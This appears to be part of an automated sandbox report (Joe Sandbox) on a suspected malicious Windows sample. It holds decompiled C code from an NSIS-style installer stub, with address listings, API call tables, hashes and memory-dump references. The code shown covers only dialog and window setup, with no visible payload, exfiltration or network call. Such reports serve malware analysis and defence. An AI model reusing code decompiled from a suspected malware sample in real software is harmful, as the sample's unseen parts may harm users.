							_v28 = _t48;
							if( *0x7a8aec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E00404498(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff10, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8aec - _t136;
							if( *0x7a8aec == _t136) {
								_push( *0x7a1f44);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff10);
							}
							E004044AB();
							E0040651A(0x7a1f48, E00403F58());
							E00406557(0x7a1f48, _t127, _t133,  &(0x7a1f48[lstrlenW(0x7a1f48)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f48); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a38); // executed
									 *0x7a0f20 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8a60,  *_t133 +  *0x7a7a40 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "5F@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x7a7a38 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404476(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a38, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x7a7a2c - _t136;
									if( *0x7a7a2c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a38, 8); // executed
									E004044C2(0x405);
									goto L60;
								}
								__eflags =  *0x7a8aec - _t136;
								if( *0x7a8aec != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8ae0 - _t136;
								if( *0x7a8ae0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a38);
						 *0x7a8a68 = _t136;
						EndDialog(_t127,  *0x7a0718);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a38, 0x40f, 0, 1);
						__eflags =  *0x7a7a2c;
						return 0 |  *0x7a7a2c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f28, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a38, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8aec - _t136;
											if( *0x7a8aec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0718 = 1;
												L23:
												_push(0x78);
												L24:
												E0040444F();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0718 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a38);
						 *0x7a7a38 = _t122;
						L60:
						if( *0x7a3f48 == _t136 &&  *0x7a7a38 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x7a3f48 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f28,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044DD(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                                                                                              0x00403f82
                                                                                                                              0x00403f89
                                                                                                                              0x004040f0
                                                                                                                              0x004040f4
                                                                                                                              0x004040f8
                                                                                                                              0x004040fa
                                                                                                                              0x004040ff
                                                                                                                              0x0040410a
                                                                                                                              0x00404115
                                                                                                                              0x0040411a
                                                                                                                              0x0040411c
                                                                                                                              0x0040411e
                                                                                                                              0x00404121
                                                                                                                              0x00404126
                                                                                                                              0x00404134
                                                                                                                              0x00404141
                                                                                                                              0x00404148
                                                                                                                              0x00404148
                                                                                                                              0x00404149
                                                                                                                              0x00404149
                                                                                                                              0x0040414e
                                                                                                                              0x00404154
                                                                                                                              0x0040415b
                                                                                                                              0x00404161
                                                                                                                              0x00404163
                                                                                                                              0x004041a3
                                                                                                                              0x004041a8
                                                                                                                              0x004041ad
                                                                                                                              0x004041ad
                                                                                                                              0x004041b2
                                                                                                                              0x004041bb
                                                                                                                              0x004041bd
                                                                                                                              0x004041c2
                                                                                                                              0x004041c8
                                                                                                                              0x004041cc
                                                                                                                              0x004041cc
                                                                                                                              0x004041d1
                                                                                                                              0x004041d7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004041e2
                                                                                                                              0x004041e8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004041f1
                                                                                                                              0x004041f9
                                                                                                                              0x004041fe
                                                                                                                              0x00404201
                                                                                                                              0x00404207
                                                                                                                              0x0040420c
                                                                                                                              0x0040420f
                                                                                                                              0x00404215
                                                                                                                              0x0040421a
                                                                                                                              0x0040421d
                                                                                                                              0x00404223
                                                                                                                              0x0040422b
                                                                                                                              0x00404231
                                                                                                                              0x00404237
                                                                                                                              0x0040423b
                                                                                                                              0x00404242
                                                                                                                              0x00404242
                                                                                                                              0x00404242
                                                                                                                              0x0040424c
                                                                                                                              0x0040425e
                                                                                                                              0x0040426a
                                                                                                                              0x0040426f
                                                                                                                              0x00404279
                                                                                                                              0x0040427f
                                                                                                                              0x00404281
                                                                                                                              0x00404286
                                                                                                                              0x00404283
                                                                                                                              0x00404283
                                                                                                                              0x00404283
                                                                                                                              0x00404296
                                                                                                                              0x004042ae
                                                                                                                              0x004042b0
                                                                                                                              0x004042b6
                                                                                                                              0x004042cb
                                                                                                                              0x004042b8
                                                                                                                              0x004042c1
                                                                                                                              0x004042c3
                                                                                                                              0x004042c3
                                                                                                                              0x004042d1
                                                                                                                              0x004042e2
                                                                                                                              0x004042f8
                                                                                                                              0x004042ff
                                                                                                                              0x00404309
                                                                                                                              0x0040430e
                                                                                                                              0x00404310
                                                                                                                              0x00000000
                                                                                                                              0x00404316
                                                                                                                              0x00404316
                                                                                                                              0x00404318
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040431e
                                                                                                                              0x00404322
                                                                                                                              0x00404347
                                                                                                                              0x0040434d
                                                                                                                              0x00404353
                                                                                                                              0x00404355
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040437b
                                                                                                                              0x00404381
                                                                                                                              0x00404383
                                                                                                                              0x00404388
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040438e
                                                                                                                              0x00404391
                                                                                                                              0x00404394
                                                                                                                              0x004043ab
                                                                                                                              0x004043b7
                                                                                                                              0x004043d0
                                                                                                                              0x004043da
                                                                                                                              0x004043df
                                                                                                                              0x004043e5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004043ef
                                                                                                                              0x004043fa
                                                                                                                              0x00000000
                                                                                                                              0x004043fa
                                                                                                                              0x00404324
                                                                                                                              0x0040432a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404330
                                                                                                                              0x00404336
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040433c
                                                                                                                              0x00404310
                                                                                                                              0x00404407
                                                                                                                              0x00404413
                                                                                                                              0x0040441a
                                                                                                                              0x00000000
                                                                                                                              0x00404165
                                                                                                                              0x00404165
                                                                                                                              0x00404168
                                                                                                                              0x0040419b
                                                                                                                              0x0040419b
                                                                                                                              0x0040419d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040419d
                                                                                                                              0x0040416e
                                                                                                                              0x00404173
                                                                                                                              0x00404175
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404185
                                                                                                                              0x0040418d
                                                                                                                              0x00000000
                                                                                                                              0x00404193
                                                                                                                              0x00403f9b
                                                                                                                              0x00403f9b
                                                                                                                              0x00403f9f
                                                                                                                              0x00403fa4
                                                                                                                              0x00403fb3
                                                                                                                              0x00403fb3
                                                                                                                              0x00403fb9
                                                                                                                              0x00403fc0
                                                                                                                              0x00404004
                                                                                                                              0x0040400a
                                                                                                                              0x00404023
                                                                                                                              0x00404026
                                                                                                                              0x00404039
                                                                                                                              0x0040403f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404045
                                                                                                                              0x00404050
                                                                                                                              0x00404052
                                                                                                                              0x00404054
                                                                                                                              0x00404073
                                                                                                                              0x00404073
                                                                                                                              0x00404076
                                                                                                                              0x0040407b
                                                                                                                              0x0040407e
                                                                                                                              0x0040408e
                                                                                                                              0x0040408f
                                                                                                                              0x00404091
                                                                                                                              0x004040c7
                                                                                                                              0x004040d7
                                                                                                                              0x00000000
                                                                                                                              0x004040d7
                                                                                                                              0x00404093
                                                                                                                              0x00404099
                                                                                                                              0x004040b2
                                                                                                                              0x004040b7
                                                                                                                              0x004040b9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004040bb
                                                                                                                              0x004040a7
                                                                                                                              0x004040a7
                                                                                                                              0x004040a9
                                                                                                                              0x004040a9
                                                                                                                              0x00000000
                                                                                                                              0x004040a9
                                                                                                                              0x0040409c
                                                                                                                              0x004040a1
                                                                                                                              0x00000000
                                                                                                                              0x004040a1
                                                                                                                              0x00404080
                                                                                                                              0x00404086
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404088
                                                                                                                              0x00000000
                                                                                                                              0x00404088
                                                                                                                              0x00404078
                                                                                                                              0x00000000
                                                                                                                              0x00404078
                                                                                                                              0x0040405e
                                                                                                                              0x00404065
                                                                                                                              0x0040406b
                                                                                                                              0x0040406d
                                                                                                                              0x00404443
                                                                                                                              0x00000000
                                                                                                                              0x00404443
                                                                                                                              0x00000000
                                                                                                                              0x0040406d
                                                                                                                              0x0040402b
                                                                                                                              0x00000000
                                                                                                                              0x00404033
                                                                                                                              0x00404012
                                                                                                                              0x00404018
                                                                                                                              0x00404420
                                                                                                                              0x00404426
                                                                                                                              0x00404433
                                                                                                                              0x00404439
                                                                                                                              0x00404439
                                                                                                                              0x00000000
                                                                                                                              0x00403fc2
                                                                                                                              0x00403fc7
                                                                                                                              0x00403fd3
                                                                                                                              0x00403fdc
                                                                                                                              0x004040dd
                                                                                                                              0x00000000
                                                                                                                              0x00403ffb
                                                                                                                              0x00403ffe
                                                                                                                              0x00000000
                                                                                                                              0x00403ffe
                                                                                                                              0x00403fdc
                                                                                                                              0x00403fc0

                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
                                                                                                                              • ShowWindow.USER32(?), ref: 00403FD3
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00403FFE
                                                                                                                              • DestroyWindow.USER32 ref: 00404012
                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040402B
                                                                                                                              • GetDlgItem.USER32(?,?), ref: 0040404A
                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00404065
                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00404110
                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0040411A
                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404134
                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 0040422B
                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040424C
                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404279
                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040428F
                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404296
                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
                                                                                                                              • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
                                                                                                                              • SetWindowTextW.USER32(?,007A1F48), ref: 004042FF
                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404433
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 121052019-0
                                                                                                                              • Opcode ID: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                                                                                                                              • Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
                                                                                                                              • Opcode Fuzzy Hash: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                                                                                                                              • Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403BC9 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 301 403bc9-403be1 call 4068e7 304 403be3-403bf3 call 406461 301->304 305 403bf5-403c2c call 4063e8 301->305 313 403c4f-403c78 call 403e9f call 405ef1 304->313 309 403c44-403c4a lstrcatW 305->309 310 403c2e-403c3f call 4063e8 305->310 309->313 310->309 319 403d0a-403d12 call 405ef1 313->319 320 403c7e-403c83 313->320 326 403d20-403d45 LoadImageW 319->326 327 403d14-403d1b call 406557 319->327 320->319 321 403c89-403cb1 call 4063e8 320->321 321->319 330 403cb3-403cb7 321->330 328 403dc6-403dce call 40140b 326->328 329 403d47-403d77 RegisterClassW 326->329 327->326 343 403dd0-403dd3 328->343 344 403dd8-403de3 call 403e9f 328->344 332 403e95 329->332 333 403d7d-403dc1 SystemParametersInfoW CreateWindowExW 329->333 335 403cc9-403cd5 lstrlenW 330->335 336 403cb9-403cc6 call 405e16 330->336 341 403e97-403e9e 332->341 333->328 337 403cd7-403ce5 lstrcmpiW 335->337 338 403cfd-403d05 call 405de9 call 40651a 335->338 336->335 337->338 342 403ce7-403cf1 GetFileAttributesW 337->342 338->319 347 403cf3-403cf5 342->347 348 403cf7-403cf8 call 405e35 342->348 343->341 354 403de9-403e03 ShowWindow call 406877 344->354 355 403e6c-403e6d call 40564f 344->355 347->338 347->348 348->338 362 403e05-403e0a call 406877 354->362 363 403e0f-403e21 GetClassInfoW 354->363 358 403e72-403e74 355->358 360 403e76-403e7c 358->360 361 403e8e-403e90 call 40140b 358->361 360->343 364 403e82-403e89 call 40140b 360->364 361->332 362->363 367 403e23-403e33 GetClassInfoW RegisterClassW 363->367 368 403e39-403e5c DialogBoxParamW call 40140b 363->368 364->343 367->368 371 403e61-403e6a call 403b19 368->371 371->341
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E00403BC9(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8a70;
				_t22 = E004068E7(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f48;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E004063E8(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f48, 0);
					__eflags =  *0x7a1f48;
					if(__eflags == 0) {
						E004063E8(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f48, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406461(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403E9F(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x7a8ae0 =  *0x7a8a78 & 0x00000020;
				 *0x7a8afc = 0x10000;
				if(E00405EF1(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405EF1(_t98, _t86) == 0) {
						E00406557(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8a60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a48 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E9F(_t78, __eflags);
							__eflags =  *0x7a8b00;
							if( *0x7a8b00 != 0) {
								_t33 = E0040564F(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a2c;
								if( *0x7a7a2c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f28, 5); // executed
							_t39 = E00406877("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406877("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a00);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a00);
								 *0x7a7a24 = _t87;
								RegisterClassW(0x7a7a00);
							}
							_t44 = DialogBoxParamW( *0x7a8a60,  *0x7a7a40 + 0x00000069 & 0x0000ffff, 0, E00403F77, 0); // executed
							E00403B19(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8a60;
						 *0x7a7a04 = E00401000;
						 *0x7a7a10 =  *0x7a8a60;
						 *0x7a7a14 = _t30;
						 *0x7a7a24 = 0x40a380;
						if(RegisterClassW(0x7a7a00) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f28 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a60, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a00;
					E004063E8(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a98 + _t78 * 2,  *0x7a8a98 +  *(_t82 + 0x4c) * 2, 0x7a6a00, 0);
					_t63 =  *0x7a6a00; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a02;
						 *((short*)(E00405E16(0x7a6a02, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040651A(_t86, E00405DE9(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E35(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                                                              0x00403bcf
                                                                                                                              0x00403bd8
                                                                                                                              0x00403bdf
                                                                                                                              0x00403be1
                                                                                                                              0x00403bf5
                                                                                                                              0x00403c07
                                                                                                                              0x00403c10
                                                                                                                              0x00403c19
                                                                                                                              0x00403c20
                                                                                                                              0x00403c25
                                                                                                                              0x00403c2c
                                                                                                                              0x00403c3f
                                                                                                                              0x00403c3f
                                                                                                                              0x00403c4a
                                                                                                                              0x00403be3
                                                                                                                              0x00403bee
                                                                                                                              0x00403bee
                                                                                                                              0x00403c4f
                                                                                                                              0x00403c59
                                                                                                                              0x00403c62
                                                                                                                              0x00403c67
                                                                                                                              0x00403c78
                                                                                                                              0x00403d0a
                                                                                                                              0x00403d12
                                                                                                                              0x00403d1b
                                                                                                                              0x00403d1b
                                                                                                                              0x00403d31
                                                                                                                              0x00403d37
                                                                                                                              0x00403d45
                                                                                                                              0x00403dc6
                                                                                                                              0x00403dce
                                                                                                                              0x00403dd8
                                                                                                                              0x00403ddd
                                                                                                                              0x00403de3
                                                                                                                              0x00403e6d
                                                                                                                              0x00403e72
                                                                                                                              0x00403e74
                                                                                                                              0x00403e90
                                                                                                                              0x00000000
                                                                                                                              0x00403e90
                                                                                                                              0x00403e76
                                                                                                                              0x00403e7c
                                                                                                                              0x00403e84
                                                                                                                              0x00403e84
                                                                                                                              0x00000000
                                                                                                                              0x00403e7c
                                                                                                                              0x00403df1
                                                                                                                              0x00403dfc
                                                                                                                              0x00403e01
                                                                                                                              0x00403e03
                                                                                                                              0x00403e0a
                                                                                                                              0x00403e0a
                                                                                                                              0x00403e15
                                                                                                                              0x00403e1d
                                                                                                                              0x00403e1f
                                                                                                                              0x00403e21
                                                                                                                              0x00403e2a
                                                                                                                              0x00403e2d
                                                                                                                              0x00403e33
                                                                                                                              0x00403e33
                                                                                                                              0x00403e52
                                                                                                                              0x00403e63
                                                                                                                              0x00000000
                                                                                                                              0x00403e68
                                                                                                                              0x00403dd0
                                                                                                                              0x00403dd2
                                                                                                                              0x00000000
                                                                                                                              0x00403d47
                                                                                                                              0x00403d47
                                                                                                                              0x00403d53
                                                                                                                              0x00403d5d
                                                                                                                              0x00403d63
                                                                                                                              0x00403d68
                                                                                                                              0x00403d77
                                                                                                                              0x00403e95
                                                                                                                              0x00403e95
                                                                                                                              0x00000000
                                                                                                                              0x00403e95
                                                                                                                              0x00403d86
                                                                                                                              0x00403dc1
                                                                                                                              0x00000000
                                                                                                                              0x00403dc1
                                                                                                                              0x00403c7e
                                                                                                                              0x00403c7e
                                                                                                                              0x00403c81
                                                                                                                              0x00403c83
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403c91
                                                                                                                              0x00403ca3
                                                                                                                              0x00403ca8
                                                                                                                              0x00403cb1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403cb7
                                                                                                                              0x00403cb9
                                                                                                                              0x00403cc6
                                                                                                                              0x00403cc6
                                                                                                                              0x00403ccf
                                                                                                                              0x00403cd5
                                                                                                                              0x00403cfd
                                                                                                                              0x00403d05
                                                                                                                              0x00000000
                                                                                                                              0x00403ce7
                                                                                                                              0x00403ce8
                                                                                                                              0x00403cf1
                                                                                                                              0x00403cf7
                                                                                                                              0x00403cf8
                                                                                                                              0x00000000
                                                                                                                              0x00403cf8
                                                                                                                              0x00403cf3
                                                                                                                              0x00403cf5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403cf5
                                                                                                                              0x00403cd5

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                                                                                                                                • Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                                                                                                                              • lstrcatW.KERNEL32(1033,007A1F48), ref: 00403C4A
                                                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76D73420), ref: 00403CCA
                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
                                                                                                                              • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CE8
                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D31
                                                                                                                                • Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E
                                                                                                                              • RegisterClassW.USER32(007A7A00), ref: 00403D6E
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D86
                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DBB
                                                                                                                              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DF1
                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403E1D
                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403E2A
                                                                                                                              • RegisterClassW.USER32(007A7A00), ref: 00403E33
                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403F77,00000000), ref: 00403E52
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
